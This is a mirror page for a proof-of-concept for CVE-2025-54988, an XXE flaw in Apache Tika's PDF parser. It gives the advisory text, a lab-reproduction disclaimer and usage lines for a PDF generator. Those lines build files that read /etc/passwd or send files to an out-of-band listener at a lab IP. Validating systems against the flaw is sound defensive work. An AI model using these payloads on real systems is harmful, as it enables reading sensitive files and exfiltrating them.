CVE-2025-54988 PoC — Apache Tika PDF parser module: XXE vulnerability in PDFParser's handling of XFA

Source

https://github.com/mgthuramoemyint/POC-CVE-2025-54988

Associated Vulnerability

Title:Apache Tika PDF parser module: XXE vulnerability in PDFParser's handling of XFA (CVE-2025-54988)
Description:Critical XXE in Apache Tika (tika-parser-pdf-module) in Apache Tika 1.13 through and including 3.2.1 on all platforms allows an attacker to carry out XML External Entity injection via a crafted XFA file inside of a PDF. An attacker may be able to read sensitive data or trigger malicious requests to internal resources or third-party servers. Note that the tika-parser-pdf-module is used as a dependency in several Tika packages including at least: tika-parsers-standard-modules, tika-parsers-standard-package, tika-app, tika-grpc and tika-server-standard. Users are recommended to upgrade to version 3.2.2, which fixes this issue.

Description

A PDF generator for CVE-2025-54988

Readme

# CVE-2025-54988 - POC
Disclaimer: I am not the original discoverer of this vulnerability. This post documents my process of reproducing the issue in a controlled environment for educational purposes and to help others validate their own systems.
The tests were conducted in an isolated lab with no impact to production systems.

Usage: 

```
python3 xfa_xxe_poc_gen.py --mode file --file /etc/passwd -o xfa_passwd.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 127.0.0.1 --port 8888 --write-dtd -o xfa_oob.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 10.10.14.3 --port 8080 --oob-file /etc/hostname --param d
```

<img width="1845" height="719" alt="image" src="https://github.com/user-attachments/assets/fb7f27a8-28c8-4131-b27e-25ccab0af838" />

File Snapshot

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!